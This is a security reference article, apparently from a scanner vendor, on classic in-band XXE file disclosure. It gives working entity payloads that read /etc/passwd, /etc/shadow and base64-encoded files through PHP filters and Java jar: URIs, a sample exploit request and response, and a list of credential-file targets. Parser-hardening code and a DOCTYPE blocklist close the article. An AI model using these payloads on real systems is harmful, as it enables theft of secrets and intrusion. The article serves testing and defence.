In-band XXE that reads arbitrary server files via the file:// scheme and returns their contents directly in the XML response, exposing credentials and configuration.
TL;DR
- The file:// scheme reads arbitrary server files and returns their contents inline in the XML response
- Payload: <!ENTITY xxe SYSTEM "file:///etc/passwd"> plus &xxe; in the document body
- Typical targets: /etc/passwd, wp-config.php, .env, application.properties, ~/.aws/credentials
- Fix: disable DOCTYPE processing in the parser (disallow-doctype-decl: true)

Classic XXE file disclosure is the in-band variant of XML External Entity injection: the attacker defines an external entity pointing to a file:// URI, embeds a reference to that entity in the XML body, and the server returns the file contents directly in the HTTP response. The entire attack, delivery and exfiltration alike, flows through the same HTTP channel, making it the simplest and most immediately impactful XXE technique.
The flaw (CWE-611) exists at the parser configuration layer, not in application logic. An XML parser that resolves external entities, such as Java's DocumentBuilderFactory with default settings or PHP's DOMDocument called with LIBXML_NOENT, processes <!DOCTYPE> declarations and resolves SYSTEM entity URIs during the parse phase, before the application code ever sees the document content. The application then uses the parsed document tree, unaware that entity substitution replaced &xxe; with the contents of /etc/passwd. Note: Python's xml.etree.ElementTree does not resolve external entities and raises ParseError when it meets a reference to one, so it is safe against file disclosure. It still expands internal entities, which leaves it exposed to Billion Laughs DoS on builds linked against older Expat releases; use defusedxml for full protection.
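The stdlib behaviour described in the note can be checked locally. The following is a minimal sketch, assuming a current CPython build; `try_parse` and the two sample documents are illustrative names, not part of any library.

```python
import xml.etree.ElementTree as ET

# Internal entity: a literal string defined inside the DOCTYPE.
INTERNAL_DOC = '<!DOCTYPE r [<!ENTITY test "XXECANARY">]><r>&test;</r>'
# External entity: a SYSTEM declaration pointing at a file:// URI.
EXTERNAL_DOC = '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>'


def try_parse(document: str) -> str:
    """Parse with the stdlib parser and report what happened (hypothetical helper)."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError as exc:
        return f"ParseError: {exc}"
    return f"parsed: {root.text}"


if __name__ == "__main__":
    print(try_parse(INTERNAL_DOC))  # internal entity is expanded by the parser
    print(try_parse(EXTERNAL_DOC))  # external entity reference is rejected
```

The internal entity expands, which is why entity-expansion DoS remains a concern, while the SYSTEM reference is refused without the file ever being opened.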
Under OWASP A05:2021 (Security Misconfiguration), this vulnerability is classified as a configuration failure rather than a code-level injection flaw. The fix is a parser configuration change, not application logic refactoring. Yet classic XXE continues to appear in production systems because developers do not recognize XML parsers as a security-sensitive component requiring explicit hardening.
The attack sequence:

1. The attacker submits an XML body containing a <!DOCTYPE> declaration defining a SYSTEM entity: <!ENTITY xxe SYSTEM "file:///etc/passwd">.
2. The attacker references &xxe; in any element the application reads and reflects: a username field, a product query, a search term.

Request:

```http
POST /api/users/profile HTTP/1.1
Host: app.example.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE userInfo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <firstName>&xxe;</firstName>
  <lastName>Doe</lastName>
</userInfo>
```

Response:

```http
HTTP/1.1 200 OK
Content-Type: application/json

{
  "firstName": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n...",
  "lastName": "Doe"
}
```

The entire /etc/passwd file content replaces the firstName value in the parsed document, and the application reflects it in the response.
| Target File | OS | Sensitivity | Common Content |
|---|---|---|---|
| /etc/passwd | Linux | Medium | Usernames, UIDs, home dirs |
| /etc/shadow | Linux | Critical | Hashed passwords (requires root) |
| ~/.aws/credentials | Linux | Critical | AWS access key + secret |
| wp-config.php | Linux/Windows | Critical | MySQL credentials, auth keys |
| application.properties | Linux | Critical | DB URL, API keys, secrets |
| .env | Linux | Critical | All application secrets |
| web.config | Windows | Critical | Connection strings, secrets |
| C:\Windows\win.ini | Windows | Low | Confirms Windows + file:// access |
| /proc/self/environ | Linux | High | Environment variables (secrets in env) |
Standard file:// reads fail on binary files and may truncate content that contains characters outside the XML character range. The PHP filter wrapper encodes content as base64:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
]>
<root><data>&xxe;</data></root>
```

The response contains a base64 string. Decode offline: echo "BASE64STRING" | base64 -d. This technique reads binary files, SSH keys, and files containing null bytes that would break standard SYSTEM entity reads.
Java XML parsers support additional URI schemes beyond file://:

```xml
<!-- Read file from application classpath (works only where a classpath: URL handler is registered; the stock JDK does not ship one) -->
<!ENTITY xxe SYSTEM "classpath:application.properties">
<!-- Read file from inside a JAR archive -->
<!ENTITY xxe SYSTEM "jar:file:///path/to/application.war!/WEB-INF/web.xml">
```

The jar: scheme can read any file inside the application's own WAR/JAR, which is useful for reading WEB-INF/web.xml, applicationContext.xml, or Spring application.properties when their filesystem paths are unknown.

```xml
<!-- Older Java parsers: netdoc:// as alternative to file:// -->
<!ENTITY xxe SYSTEM "netdoc:///etc/passwd">
```

CVE-2024-34102 — Adobe Commerce CosmicSting (CVSS 9.8)
The definitive 2024 example of in-band XXE chaining to RCE. The attack reads app/etc/env.php, a PHP configuration file containing the Magento crypt/key. This key is used to sign admin JWTs. With the key extracted, the attacker forges an admin authentication token, accesses the admin REST API, and achieves code execution. More than 4,275 stores were compromised within 72 hours. The file read is the first step of the chain — not the final impact.
CVE-2024-30043 — Microsoft SharePoint Server (CVSS 6.5)
Authenticated SharePoint users could submit XML-based requests that triggered in-band file disclosure. The vulnerability exposed SharePoint server configuration files and internal path information. Patched in the May 2024 Patch Tuesday, it illustrates that even enterprise Microsoft products require explicit parser hardening.
CVE-2025-49493 — Akamai CloudTest SOAP Services (CVSS 9.1)
Multiple SOAP endpoints in Akamai's CloudTest platform returned file content in SOAP fault responses when XML entity payloads were submitted. The SOAP fault mechanism reflected the entity value as part of the error message, making this an in-band variant even though the file content appeared in an error response rather than a normal response body.
HackerOne #293795 — Uberflip REST API (High)
A REST API endpoint accepted XML bodies without entity restrictions. The researcher confirmed file disclosure by retrieving /etc/passwd content directly in the API response. Follow-up payloads read application configuration files. This report is representative of the most common discovery path: REST API accepting application/xml with no parser hardening.
Confirm XML acceptance with a baseline request (non-XXE). Check for 415 vs any other status.
Test entity expansion with an internal canary:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY test "XXECANARY-8675309">]>
<root><field>&test;</field></root>
```

If XXECANARY-8675309 appears in the response body, entity expansion is active.
Escalate to a SYSTEM entity with a safe, non-sensitive file:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///proc/version">]>
<root><field>&xxe;</field></root>
```

A Linux kernel version string appearing in the response confirms SYSTEM entity file read.
Identify a target file based on the application stack:

- PHP / WordPress: file:///var/www/html/wp-config.php, file:///var/www/html/.env
- Java / Spring: file:///app/application.properties, file:///app/application.yml
- Python / Django: file:///app/settings.py
- Windows / IIS: file:///C:/inetpub/wwwroot/web.config

Attempt the PHP filter wrapper for files that may contain binary content:

```xml
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
```

Burp Suite Pro active scanner submits internal entity canaries and checks for reflection. For in-band XXE, it verifies the canary appears in the response body across all XML-accepting endpoints in scope.
Nuclei templates in vulnerabilities/xxe/ include in-band detection templates that use unique markers and verify response reflection.
BreachVex detects classic file disclosure after first confirming entity expansion: it submits a SYSTEM entity referencing /etc/passwd and checks for known file-read markers (root:x:0:0, daemon:x:) in the response body. A high-confidence match is auto-reported.
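A marker check of this kind can be sketched in a few lines. The marker strings come from the text above; the function names and the "all markers must match" threshold are assumptions for illustration and do not describe how any particular scanner is implemented.

```python
# Known /etc/passwd fragments taken from the description above.
FILE_READ_MARKERS = ("root:x:0:0", "daemon:x:")


def passwd_markers_found(body: str) -> list[str]:
    """Return the file-read markers that occur in a response body."""
    return [marker for marker in FILE_READ_MARKERS if marker in body]


def is_high_confidence(body: str, required: int = len(FILE_READ_MARKERS)) -> bool:
    """Treat a response as a confirmed file read only when enough markers match.

    The threshold is an assumption: requiring every marker reduces false
    positives from pages that merely mention "root:x:0:0" in documentation.
    """
    return len(passwd_markers_found(body)) >= required


if __name__ == "__main__":
    sample = '{"firstName": "root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"}'
    print(passwd_markers_found(sample), is_high_confidence(sample))
```

Substring matching is used on purpose: in a JSON response the newlines of the file arrive escaped, so line-anchored patterns would miss them.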
```java
// Java: one configuration block eliminates all in-band XXE
import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Reject any document that carries a DOCTYPE declaration
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth: disable external general and parameter entities as well
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setExpandEntityReferences(false);
```

```python
# Python: replace stdlib xml with defusedxml (drop-in safe replacement)
# pip install defusedxml
from defusedxml import ElementTree as ET  # replaces import xml.etree.ElementTree as ET

tree = ET.parse(xml_file)  # file:// SYSTEM entities blocked automatically
```

```csharp
// .NET: prohibit DTD and null the resolver
var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver = null
};
using var reader = XmlReader.Create(stream, settings);
```

```php
// PHP: never pass LIBXML_NOENT; use LIBXML_NONET at minimum
// PHP 8.0+ external entity loading is off by default for DOMDocument
$dom = new DOMDocument();
// LIBXML_NONET blocks network fetches (http://, ftp://); file:// entities
// stay unexpanded as long as LIBXML_NOENT is not passed
$dom->loadXML($xml, LIBXML_NONET);
```

When DOCTYPE disabling is not possible (e.g., third-party library without parser configuration access), reject documents containing DOCTYPE:
```python
import re


def reject_if_doctype(xml_input: str) -> None:
    """Reject XML containing DOCTYPE declarations (last-resort defense)."""
    if re.search(r'<!DOCTYPE', xml_input, re.IGNORECASE):
        raise ValueError("DOCTYPE declarations are not permitted")
```

Blocklist patterns for <!DOCTYPE are not a reliable primary defense. They can be bypassed via UTF-16 or other encoding tricks, or by using XInclude (which does not use DOCTYPE). Parser-level configuration is the only reliable control.
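The UTF-16 bypass is easy to reproduce. The sketch below assumes the filter inspects the raw request bytes before any decoding; `naive_has_doctype` and `parser_sees_doctype` are hypothetical helpers. The second one lets Expat (via the stdlib `xml.parsers.expat` module) detect the encoding and report the DOCTYPE through its `StartDoctypeDeclHandler` callback. It remains a pre-filter and does not address XInclude.

```python
import re
from xml.parsers import expat

PAYLOAD = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>'


class _DoctypeFound(Exception):
    """Raised from the Expat callback to stop parsing at the first DOCTYPE."""


def naive_has_doctype(raw: bytes) -> bool:
    """Byte-level blocklist, as a filter in front of the parser might apply it."""
    return re.search(rb"<!DOCTYPE", raw, re.IGNORECASE) is not None


def parser_sees_doctype(raw: bytes) -> bool:
    """Let Expat detect the encoding and report whether a DOCTYPE is declared.

    Malformed input raises expat.ExpatError, which callers should treat as a
    rejection as well.
    """
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise _DoctypeFound(name)

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(raw, True)
    except _DoctypeFound:
        return True
    return False


if __name__ == "__main__":
    utf16 = PAYLOAD.encode("utf-16")  # BOM plus two bytes per character
    print(naive_has_doctype(utf16))   # the byte pattern no longer matches
    print(parser_sees_doctype(utf16))
```

In UTF-16 every ASCII character is followed by a zero byte, so the literal byte sequence `<!DOCTYPE` never occurs, while the parser still reads the declaration normally.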
An attacker can read any file readable by the operating system user running the XML-processing service. Common targets: /etc/passwd (user enumeration), /etc/shadow (password hashes, if root), application config files (wp-config.php, application.properties, .env, database.yml), SSH private keys (~/.ssh/id_rsa), cloud credentials (~/.aws/credentials), and Java keystores. On Windows: C:\Windows\System32\drivers\etc\hosts, web.config, applicationHost.config.
A SYSTEM entity is an XML external entity declaration that references a URI using the SYSTEM keyword: <!ENTITY name SYSTEM 'URI'>. When the parser encounters &name; in the document body, it fetches the URI content and substitutes it inline. URI schemes supported by most parsers include file://, http://, https://, and ftp://. The SYSTEM keyword distinguishes external entities (which fetch URIs) from internal entities (which define literal string values).
Classic in-band file disclosure returns the file content directly in the HTTP response — the attacker reads it immediately. Blind OOB XXE exfiltrates content via a side channel (DNS or HTTP callback) when the application does not reflect the parsed entity value. Classic is simpler to exploit but easier to detect; blind OOB is more common in practice because modern applications rarely reflect raw XML entity values.
Detection follows a two-step approach. First, test entity expansion with an internal entity (<!ENTITY test 'XXECANARY123'>): if XXECANARY123 appears in the response, entity expansion is confirmed. Then escalate to a SYSTEM entity: <!ENTITY xxe SYSTEM 'file:///etc/passwd'>. If /etc/passwd content appears, classic file disclosure is confirmed. BreachVex uses unique per-probe canary tokens to prevent cross-probe false positives.
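The two probes and the per-probe canary idea can be sketched as follows. All function names, the `field` element, and the token format are assumptions for illustration; `simulate_reflecting_endpoint` stands in for a target that echoes a parsed field and uses the stdlib parser, which expands internal entities only.

```python
import json
import secrets
import xml.etree.ElementTree as ET


def build_canary_probe(field: str = "field") -> tuple[str, str]:
    """Step 1: internal entity with a token unique to this probe."""
    token = f"XXECANARY-{secrets.token_hex(4)}"
    payload = (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY test "{token}">]>\n'
        f"<root><{field}>&test;</{field}></root>"
    )
    return token, payload


def build_system_probe(file_uri: str = "file:///proc/version", field: str = "field") -> str:
    """Step 2: SYSTEM entity pointing at a non-sensitive file."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{file_uri}">]>\n'
        f"<root><{field}>&xxe;</{field}></root>"
    )


def canary_reflected(token: str, response_body: str) -> bool:
    """Entity expansion is confirmed only if this probe's own token comes back."""
    return token in response_body


def simulate_reflecting_endpoint(payload: str, field: str = "field") -> str:
    """Hypothetical stand-in for an endpoint that echoes the parsed field as JSON."""
    root = ET.fromstring(payload)
    return json.dumps({field: root.findtext(field)})


if __name__ == "__main__":
    token, payload = build_canary_probe()
    print(canary_reflected(token, simulate_reflecting_endpoint(payload)))
```

Generating a fresh token per probe means a match can only come from that request, not from cached or previously stored input.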
Plain SYSTEM entities can read binary files only partially. XML requires well-formed UTF-8 or UTF-16 text. Binary files containing bytes outside the valid XML character range cause parser errors and may truncate the response. Binary files can be read via PHP filter wrappers (php://filter/convert.base64-encode/resource=...), which encode the content as base64 before substitution. Java parsers may also handle this via custom resolvers, but standard setups cannot reliably read arbitrary binary files inline.
CVE-2024-30043 (Microsoft SharePoint, CVSS 6.5) — authenticated attacker reads files from the SharePoint server filesystem. CVE-2025-49493 (Akamai CloudTest, CVSS 9.1) — SOAP endpoints return file contents in SOAP fault responses. CVE-2024-34102 (Adobe Commerce CosmicSting, CVSS 9.8) — reads app/etc/env.php to extract the crypt key for an RCE chain. CVE-2025-13096 (IBM BAW, CVSS 8.2) — XML processing exposes internal configuration.
Windows file URIs use the format file:///C:/path/to/file with forward slashes (for example, file:///C:/Windows/System32/drivers/etc/hosts); the backslash form file:///C:\path\to\file may also be accepted. Both UNC paths (file://SERVER/share/file) and local paths work on Java/Xerces and MSXML parsers. Windows-specific targets include C:\Windows\win.ini, C:\inetpub\wwwroot\web.config, C:\Users\<username>\.aws\credentials, and C:\Program Files\Apache Tomcat\conf\server.xml.
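Converting a Windows path to the forward-slash URI form is mechanical. A minimal sketch, assuming drive-letter or UNC input; `windows_path_to_file_uri` is a hypothetical helper built on `urllib.parse.quote`, which percent-encodes spaces.

```python
from urllib.parse import quote


def windows_path_to_file_uri(path: str) -> str:
    """Convert a drive-letter or UNC Windows path to a file: URI."""
    normalized = path.replace("\\", "/")
    if normalized.startswith("//"):
        # UNC path: //SERVER/share/file becomes file://SERVER/share/file
        return "file:" + quote(normalized, safe="/")
    # Local path: keep the drive colon, percent-encode everything unsafe
    return "file:///" + quote(normalized, safe="/:")


if __name__ == "__main__":
    print(windows_path_to_file_uri(r"C:\Windows\win.ini"))
    print(windows_path_to_file_uri(r"C:\Program Files\Apache Tomcat\conf\server.xml"))
    print(windows_path_to_file_uri(r"\\SERVER\share\file"))
```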
HTTP 400 Bad Request with error text like 'DOCTYPE not allowed', 'DTD is prohibited', or 'Feature disallow-doctype-decl is enabled' indicates the parser is hardened against DOCTYPE. HTTP 400 with 'External entity' or 'Disallowed URI scheme' indicates entity resolution is blocked. HTTP 415 Unsupported Media Type means the endpoint does not accept XML at all. An HTTP 200 with the application's normal response (but without file content) may indicate entity expansion is disabled but the document was otherwise processed.
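These response patterns can be turned into a small triage helper. This is a sketch: the status codes and error strings are the ones listed above, while `interpret_response` and its return labels are assumptions, and real parsers word their errors in many other ways.

```python
DOCTYPE_ERRORS = ("doctype not allowed", "dtd is prohibited", "disallow-doctype-decl")
ENTITY_ERRORS = ("external entity", "disallowed uri scheme")


def interpret_response(status: int, body: str) -> str:
    """Map an HTTP status and body to a rough XXE triage verdict."""
    text = body.lower()
    if status == 415:
        return "endpoint does not accept XML"
    if status == 400:
        if any(err in text for err in DOCTYPE_ERRORS):
            return "parser hardened against DOCTYPE"
        if any(err in text for err in ENTITY_ERRORS):
            return "entity resolution blocked"
        return "rejected for another reason"
    if status == 200:
        return "processed: check the body for the canary or file content"
    return "inconclusive"


if __name__ == "__main__":
    print(interpret_response(400, "Feature disallow-doctype-decl is enabled"))
    print(interpret_response(415, ""))
```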
Use a non-sensitive, always-present file: on Linux, /proc/version (kernel version string) or /proc/sys/kernel/hostname (hostname) are safe to read and confirm file:// access without exposing credentials. On Windows, C:\Windows\System32\drivers\etc\hosts is low-sensitivity. Alternatively, use a local entity with a unique canary string first, then escalate to a known-safe file to confirm SYSTEM entity resolution before targeting sensitive paths.
PHP filter wrappers allow reading binary or multi-line files by encoding them as base64: <!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=/etc/passwd'>. The parser fetches the PHP stream, which base64-encodes the file content. The response contains a base64 string that the attacker decodes offline. This technique bypasses the XML well-formedness restriction on binary content and handles files containing newlines or null bytes that would otherwise truncate standard SYSTEM entity reads.
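The offline decoding step is a plain base64 decode. A minimal sketch using the stdlib `base64` module; `decode_filter_output` is a hypothetical helper, and stripping whitespace first is an assumption about how the reflected value may be wrapped in the response.

```python
import base64
import binascii


def decode_filter_output(value: str) -> bytes:
    """Decode the base64 string reflected in the response back to file bytes."""
    cleaned = "".join(value.split())  # drop line breaks or padding whitespace
    try:
        return base64.b64decode(cleaned, validate=True)
    except binascii.Error as exc:
        raise ValueError("response field is not valid base64") from exc


if __name__ == "__main__":
    reflected = base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode("ascii")
    print(decode_filter_output(reflected))
```

Returning bytes instead of text keeps binary files such as keystores intact.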
SOAP-based enterprise services (Java CXF, Apache Axis2, WCF) built before 2015 often have unconfigured parsers. WordPress sites exposing xmlrpc.php. Applications built on Spring Boot with Jackson-dataformat-xml (older versions). Any application using Java's javax.xml.parsers.DocumentBuilder without setting disallow-doctype-decl. Adobe Commerce / Magento installations pre-CVE-2024-34102 patch. SAP ABAP SOAP services. Oracle E-Business Suite XML endpoints.